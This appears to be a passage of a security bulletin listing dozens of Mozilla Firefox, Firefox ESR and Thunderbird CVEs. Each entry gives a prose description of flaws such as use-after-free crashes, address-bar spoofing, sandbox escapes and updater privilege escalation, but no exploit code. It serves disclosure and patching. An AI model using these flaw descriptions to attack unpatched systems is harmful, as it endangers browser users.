mozilla -- firefoxMemory safety bugs were reported in Firefox 54. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7780
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxAndroid intent URLs given to Firefox for Android can be used to navigate from HTTP or HTTPS URLs to local "file:" URLs, allowing for the reading of local data through a violation of same-origin policy. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 54.2018-06-11not yet calculatedCVE-2017-7759
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxOn Windows systems, the logger run by the Windows updater deletes the file "update.log" before it runs in order to write a new log of that name. The path to this file is supplied at the command line to the updater and could be used in concert with another local exploit to delete a different file named "update.log" instead of the one intended. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7796
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxIn 32-bit versions of Firefox, the Adobe Flash plugin setting for "Enable Adobe Flash protected mode" is unchecked by default even though the Adobe Flash sandbox is actually enabled. The displayed state is the reverse of the true setting, resulting in user confusion. This could cause users to select this setting intending to activate it and inadvertently turn protections off. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5165
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxCanvas allows the use of the "feDisplacementMap" filter on images loaded cross-origin. The rendering by the filter is variable depending on the input pixel, allowing for timing attacks when the images are loaded from third party locations. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9077
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxAndroid intents can be used to launch Firefox for Android in reader mode with a user specified URL. This allows an attacker to spoof the contents of the addressbar as displayed to users. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 53.2018-06-11not yet calculatedCVE-2017-5463
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxOn pages containing an iframe, the "data:" protocol can be used to create a modal dialog through Javascript that will have an arbitrary domains as the dialog's location, spoofing of the origin of the modal dialog from the user view. Note: This attack only affects installations with e10 multiprocess turned off. Installations with e10s turned on do not support the modal dialog functionality. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7815
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxProxy Auto-Config (PAC) files can specify a JavaScript function called for all URL requests with the full URL path which exposes more information than would be sent to the proxy itself in the case of HTTPS. Normally the Proxy Auto-Config file is specified by the user or machine owner and presumed to be non-malicious, but if a user has enabled Web Proxy Auto Detect (WPAD) this file can be served remotely. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5384
BID
SECTRACK
CONFIRM
MISC
CONFIRM
mozilla -- firefoxA spoofing vulnerability can occur when a page switches to fullscreen mode without user notification, allowing a fake address bar to be displayed. This allows an attacker to spoof which page is actually loaded and in use. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7817
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxOn Linux systems, if the content process is compromised, the sandbox broker will allow files to be truncated even though the sandbox explicitly only has read access to the local file system and no write permissions. Note: This attack only affects the Linux operating system. Other operating systems are not affected. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7794
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxWeak proxy objects have weak references on multiple threads when they should only have them on one, resulting in incorrect memory usage and corruption, which leads to potentially exploitable crashes. Note: This issue only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5392
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxA potentially exploitable use-after-free crash during actor destruction with service workers. This issue does not affect releases earlier than Firefox 49. This vulnerability affects Firefox < 49.0.2.2018-06-11not yet calculatedCVE-2016-5287
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxMozilla's add-ons SDK had a world-accessible resource with an HTML injection vulnerability. If an additional vulnerability allowed this resource to be loaded as a document it could allow injecting content and script into an add-on's context. This vulnerability affects Firefox < 50.1.2018-06-11not yet calculatedCVE-2016-9903
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxWebExtensions can bypass security checks to load privileged URLs and potentially escape the WebExtension sandbox. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9073
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxMalicious sites can display a spoofed location bar on a subsequently loaded page when the existing location bar on the new page is scrolled out of view if navigations between pages can be timed correctly. Note: This issue only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5395
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxThe "browser.identity.launchWebAuthFlow" function of WebExtensions is only allowed to load content over "https:" but this requirement was not properly enforced. This can potentially allow privileged pages to be loaded by the extension. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5113
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxThe cache directory on the local file system is set to be world writable. Firefox defaults to extracting libraries from this cache. This allows for the possibility of an installed malicious application or tools with write access to the file system to replace files used by Firefox with their own versions. This vulnerability affects Firefox < 51.0.3.2018-06-11not yet calculatedCVE-2017-5397
BID
CONFIRM
CONFIRM
mozilla -- firefoxWebRTC can use a "WrappedI420Buffer" pixel buffer but the owning image object can be freed while it is still in use. This can result in the WebRTC encoder using uninitialized memory, leading to a potentially exploitable crash. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5160
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxMalicious sites can display a spoofed addressbar on a page when the existing location bar on the new page is scrolled out of view if an HTML editable page element is user selected. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 53.2018-06-11not yet calculatedCVE-2017-5452
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxThe filename appearing in the "Downloads" panel improperly renders some Unicode characters, allowing for the file name to be spoofed. This can be used to obscure the file extension of potentially executable files from user view in the panel. Note: the dialog to open the file will show the full, correct filename and whether it is executable or not. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5173
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxA vulnerability exists in XSLT during number formatting where a negative buffer size may be allocated in some instances, leading to a buffer overflow and crash if it occurs. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5177
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxPrivate browsing mode leaves metadata information, such as URLs, for sites visited in "browser.db" and "browser.db-wal" files within the Firefox profile after the mode is exited. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9062
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxA use-after-free vulnerability can occur during WebGL operations. While this results in a potentially exploitable crash, the vulnerability is limited because the memory is freed and reused in a brief window of time during the freeing of the same callstack. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5180
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxA content security policy (CSP) "frame-ancestors" directive containing origins with paths allows for comparisons against those paths instead of the origin. This results in a cross-origin information leak of this path information. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7808
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxThe "pingsender" executable used by the Firefox Health Report dynamically loads a system copy of libcurl, which an attacker could replace. This allows for privilege escalation as the replaced libcurl code will run with Firefox's privileges. Note: This attack requires an attacker have local system access and only affects OS X and Linux. Windows systems are not affected. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7836
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxWebExtensions can bypass normal restrictions in some circumstances and use "browser.tabs.executeScript" to inject scripts into contexts where this should not be allowed, such as pages from other WebExtensions or unprivileged "about:" pages. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5135
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxIf cursor visibility is toggled by script using from 'none' to an image and back through script, the cursor will be rendered temporarily invisible within Firefox. Note: This vulnerability only affects OS X. Other operating systems are not affected. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5110
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxThe JSON Viewer displays clickable hyperlinks for strings that are parseable as URLs, including "javascript:" links. If a JSON file contains malicious JavaScript script embedded as "javascript:" links, users may be tricked into clicking and running this code in the context of the JSON Viewer. This can allow for the theft of cookies and authorization tokens which are accessible to that context. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5176
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxMemory safety bugs were reported in Firefox 53. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 54.2018-06-11not yet calculatedCVE-2017-5471
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxA heap buffer overflow vulnerability may occur in WebAssembly when "shrinkElements" is called followed by garbage collection on memory that is now uninitialized. This results in a potentially exploitable crash. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5094
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxSpecial "about:" pages used by web content, such as RSS feeds, can load privileged "about:" pages in an iframe. If a content-injection bug were found in one of those pages this could allow for potential privilege escalation. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5391
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxA combination of an external SVG image referenced on a page and the coloring of anchor links stored within this image can be used to determine which pages a user has in their history. This can allow a malicious website to query user history. Note: This issue only affects Firefox 57. Earlier releases are not affected. This vulnerability affects Firefox < 57.0.1.2018-06-11not yet calculatedCVE-2017-7844
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxA mechanism where when a new tab is loaded through JavaScript events, if fullscreen mode is then entered, the addressbar will not be rendered. This would allow a malicious site to displayed a spoofed addressbar, showing the location of an arbitrary website instead of the one loaded. Note: this issue only affects Firefox for Android. Desktop Firefox is unaffected. This vulnerability affects Firefox < 54.2018-06-11not yet calculatedCVE-2017-7770
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxIf a server sends two Strict-Transport-Security (STS) headers for a single connection, they will be rejected as invalid and HTTP Strict Transport Security (HSTS) will not be enabled for the connection. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7789
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxWhen an "iframe" has a "sandbox" attribute and its content is specified using "srcdoc", that content does not inherit the containing page's Content Security Policy (CSP) as it should unless the sandbox attribute included "allow-same-origin". This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7788
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxIf an existing cookie is changed to be "HttpOnly" while a document is open, the original value remains accessible through script until that document is closed. Network requests correctly use the changed HttpOnly cookie. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5114
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxRedirection from an HTTP connection to a "data:" URL assigns the referring site's origin to the "data:" URL in some circumstances. This can result in same-origin violations against a domain if it loads resources from malicious sites. Cross-origin setting of cookies has been demonstrated without the ability to read them. Note: This issue only affects Firefox 49 and 50. This vulnerability affects Firefox < 50.0.1.2018-06-11not yet calculatedCVE-2016-9078
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxIf a URL using the "file:" protocol is dragged and dropped onto an open tab that is running in a different child process the tab will open a local file corresponding to the dropped URL, contrary to policy. One way to make the target tab open more reliably in a separate process is to open it with the "noopener" keyword. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5181
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxSome Arabic and Indic vowel marker characters can be combined with Latin characters in a domain name to eclipse the non-Latin character with some font sets on the addressbar. The non-Latin character will not be visible to most viewers. This allows for domain spoofing attacks because these combined domain names do not display as punycode. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7833
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxMemory safety bugs were reported in Firefox 55. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7811
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefoxWebExtensions can bypass user prompts to first save and then open an arbitrarily downloaded file. This can result in an executable file running with local user privileges without explicit user consent. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5105
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxIf websocket data is sent with mixed text and binary in a single message, the binary data can be corrupted. This can result in an out-of-bounds read with the read memory sent to the originating server in response. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5153
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox_and_firefox_esrThe Pocket toolbar button, once activated, listens for events fired from it's own pages but does not verify the origin of incoming events. This allows content from other origins to fire events and inject content and commands into the Pocket context. Note: this issue does not affect users with e10s enabled. This vulnerability affects Firefox ESR < 45.6 and Firefox < 50.1.2018-06-11not yet calculatedCVE-2016-9902
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM

mozilla -- firefox_and_firefox_esr
A use-after-free vulnerability can occur in the compositor during certain graphics operations when a raw pointer is used instead of a reference counted one. This results in a potentially exploitable crash. This vulnerability affects Firefox ESR < 52.7.3 and Firefox < 59.0.2.2018-06-11not yet calculatedCVE-2018-5148
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- firefox_and_firefox_esrHTML tags received from the Pocket server will be processed without sanitization and any JavaScript code executed will be run in the "about:pocket-saved" (unprivileged) page, giving it access to Pocket's messaging API through HTML injection. This vulnerability affects Firefox ESR < 45.6 and Firefox < 50.1.2018-06-11not yet calculatedCVE-2016-9901
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esrWebExtension scripts can use the "data:" protocol to affect pages loaded by other web extensions using this protocol, leading to potential data disclosure or privilege escalation in affected extensions. This vulnerability affects Firefox ESR < 45.7 and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5386
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esrA mechanism to bypass file system access protections in the sandbox using the file system request constructor through an IPC message. This allows for read and write access to the local file system. This vulnerability affects Firefox ESR < 52.1 and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5456
BID
SECTRACK
REDHAT
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esrThe Developer Tools feature suffers from a XUL injection vulnerability due to improper sanitization of the web page source code. In the worst case, this could allow arbitrary code execution when opening a malicious page with the style editor tool. This vulnerability affects Firefox ESR < 52.3 and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7798
BID
SECTRACK
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esrA use-after-free vulnerability can occur during WebRTC connections when interacting with the DTMF timers. This results in a potentially exploitable crash. This vulnerability affects Firefox ESR < 52.6 and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5091
BID
SECTRACK
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
When Private Browsing mode is used, it is possible for a web worker to write persistent data to IndexedDB and fingerprint a user uniquely. IndexedDB should not be available in Private Browsing mode and this stored data will persist across multiple private browsing mode sessions because it is not cleared when exiting. This vulnerability affects Firefox ESR < 52.5.2 and Firefox < 57.0.1.2018-06-11not yet calculatedCVE-2017-7843
BID
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The libtremor library has the same flaw as CVE-2018-5146. This library is used by Firefox in place of libvorbis on Android and ARM platforms. This vulnerability affects Firefox ESR < 52.7.2 and Firefox < 59.0.1.2018-06-11not yet calculatedCVE-2018-5147
BID
SECTRACK
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
CONFIRM
mozilla -- firefox_and_firefox_esr
 
An attack using manipulation of "updater.ini" contents, used by the Mozilla Windows Updater, and privilege escalation through the Mozilla Maintenance Service to allow for arbitrary file execution and deletion by the Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.2018-06-11not yet calculatedCVE-2017-7766
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Maintenance Service can be invoked by an unprivileged user to overwrite arbitrary files with junk data using the Mozilla Windows Updater, which runs with the Maintenance Service's privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.2018-06-11not yet calculatedCVE-2017-7767
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
Under certain circumstances the "fetch()" API can return transient local copies of resources that were sent with a "no-store" or "no-cache" cache header instead of downloading a copy from the network as it should. This can result in previously stored, locally cached data of a website being accessible to users if they share a common profile while browsing. This vulnerability affects Firefox ESR < 52.7 and Firefox < 59.2018-06-11not yet calculatedCVE-2018-5131
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
When the Mozilla Updater is run, if the Updater's log file in the working directory points to a hardlink, data can be appended to an arbitrary local file. This vulnerability requires local system access. Note: this issue only affects Windows operating systems. This vulnerability affects Firefox ESR < 45.5 and Firefox < 50.2018-06-11not yet calculatedCVE-2016-5293
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
Same-origin protections for the PDF viewer can be bypassed, allowing a malicious site to intercept messages meant for the viewer. This could allow the site to retrieve PDF files restricted to viewing by an authenticated user on a third-party website. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60.2018-06-11not yet calculatedCVE-2018-5157
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
Add-on updates failed to verify that the add-on ID inside the signed package matched the ID of the add-on being updated. An attacker who could perform a man-in-the-middle attack on the user's connection to the update server and defeat the certificate pinning protection could provide a malicious signed add-on instead of a valid update. This vulnerability affects Firefox ESR < 45.5 and Firefox < 50.2018-06-11not yet calculatedCVE-2016-9064
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Maintenance Service can be invoked by an unprivileged user to read 32 bytes of any arbitrary file on the local system by convincing the service that it is reading a status file provided by the Mozilla Windows Updater. The Mozilla Maintenance Service executes with privileged access, bypassing system protections against unprivileged users. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.2018-06-11not yet calculatedCVE-2017-7768
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The internal feed reader APIs that crossed the sandbox barrier allowed for a sandbox escape and escalation of privilege if combined with another vulnerability that resulted in remote code execution inside the sandboxed process. This vulnerability affects Firefox ESR < 52.1 and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5455
BID
SECTRACK
REDHAT
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
An integer overflow in "createImageBitmap()" was reported through the Pwn2Own contest. The fix for this vulnerability disables the experimental extensions to the "createImageBitmap" API. This function runs in the content sandbox, requiring a second vulnerability to compromise a user's computer. This vulnerability affects Firefox ESR < 52.0.1 and Firefox < 52.0.1.2018-06-11not yet calculatedCVE-2017-5428
REDHAT
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Windows updater modifies some files to be updated by reading the original file and applying changes to it. The location of the original file can be altered by a malicious user by passing a special path to the callback parameter through the Mozilla Maintenance Service, allowing the manipulation of files in the installation directory and privilege escalation by manipulating the Mozilla Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.2018-06-11not yet calculatedCVE-2017-7760
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Maintenance Service "helper.exe" application creates a temporary directory writable by non-privileged users. When this is combined with creation of a junction (a form of symbolic link), protected files in the target directory of the junction can be deleted by the Mozilla Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.2018-06-11not yet calculatedCVE-2017-7761
BID
SECTRACK
CONFIRM
MISC
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
An out-of-bounds write in "ClearKeyDecryptor" while decrypting some Clearkey-encrypted media content. The "ClearKeyDecryptor" code runs within the Gecko Media Plugin (GMP) sandbox. If a second mechanism is found to escape the sandbox, this vulnerability allows for the writing of arbitrary data within memory, resulting in a potentially exploitable crash. This vulnerability affects Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5448
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Windows updater can be called by a non-privileged user to delete an arbitrary local file by passing a special path to the callback parameter through the Mozilla Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 45.8 and Firefox < 52.2018-06-11not yet calculatedCVE-2017-5409
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The PDF viewer does not sufficiently sanitize PostScript calculator functions, allowing malicious JavaScript to be injected through a crafted PDF file. This JavaScript can then be run with the permissions of the PDF viewer by its worker. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60.2018-06-11not yet calculatedCVE-2018-5158
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
When packets with a mismatched RTP payload type are sent in WebRTC connections, in some circumstances a potentially exploitable crash is triggered. This vulnerability affects Firefox ESR < 52.7 and Firefox < 59.2018-06-11not yet calculatedCVE-2018-5130
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbirdA buffer overflow read during SVG filter color value operations, resulting in data exposure. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5412
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbirdThe file picker dialog can choose and display the wrong local default directory when instantiated. On some operating systems, this can lead to information disclosure, such as the operating system or the local account name. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5414
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbirdIf a malicious site uses the "view-source:" protocol in a series within a single hyperlink, it can trigger a non-exploitable browser crash when the hyperlink is selected. This was fixed by no longer making "view-source:" linkable. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5422
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A malicious site could spoof the contents of the print preview window if popup windows are enabled, resulting in user confusion of what site is currently loaded. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5421
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
If a malicious site repeatedly triggers a modal authentication prompt, eventually the browser UI will become non-responsive, requiring shutdown through the operating system. This is a denial of service (DOS) attack. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5419
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
On Linux, if the secure computing mode BPF (seccomp-bpf) filter is running when the Gecko Media Plugin sandbox is started, the sandbox fails to be applied and items that would run within the sandbox are run protected only by the running filter which is typically weak compared to the sandbox. Note: this issue only affects Linux. Other operating systems are not affected. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5426
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A segmentation fault can occur during some bidirectional layout operations. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5413
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A segmentation fault can occur in the Skia graphics library during some canvas operations due to issues with mask/clip intersection and empty masks. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5406
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
An out of bounds read error occurs when parsing some HTTP digest authorization responses, resulting in information leakage through the reading of random memory containing matches to specifically set patterns. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5418
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
Memory safety bugs were reported in Firefox 51. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5399
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A use-after-free vulnerability can occur while editing events in form elements on a page, resulting in a potentially exploitable crash. This vulnerability affects Firefox ESR < 52.6 and Thunderbird < 52.6.2018-06-11not yet calculatedCVE-2018-5096
BID
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A use-after-free can occur during buffer storage operations within the ANGLE graphics library, used for WebGL content. The buffer storage can be freed while still in use in some circumstances, leading to a potentially exploitable crash. Note: This issue is in "libGLES", which is only in use on Windows. Other operating systems are not affected. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5411
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
Memory safety bugs were reported in Firefox ESR 52.6. These bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox ESR < 52.7 and Thunderbird < 52.7.2018-06-11not yet calculatedCVE-2018-5145
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A potentially exploitable crash in "EnumerateSubDocuments" while adding or removing sub-documents. This vulnerability affects Firefox ESR < 45.6 and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9905
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
In certain circumstances a networking event listener can be prematurely released. This appears to result in a null dereference in practice. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5416
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
When adding a range to an object in the DOM, it is possible to use "addRange" to add the range to an incorrect root object. This triggers a use-after-free, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5403
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
The Gecko Media Plugin sandbox allows access to local files that match specific regular expressions. On OS OX, this matching allows access to some data in subdirectories of "/private/var" that could expose personal or temporary data. This has been updated to not allow access to "/private/var" and its subdirectories. Note: this issue only affects OS X. Other operating systems are not affected. This vulnerability affects Firefox < 52 and Thunderbird < 52.2018-06-11not yet calculatedCVE-2017-5425
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 50.0.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 50.1.2018-06-11not yet calculatedCVE-2016-9080
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The printing process can bypass local access protections to read files available through symlinks, bypassing local file restrictions. The printing process requires files in a specific format so arbitrary data cannot be read but it is possible that some local file information could be exposed. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5107
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
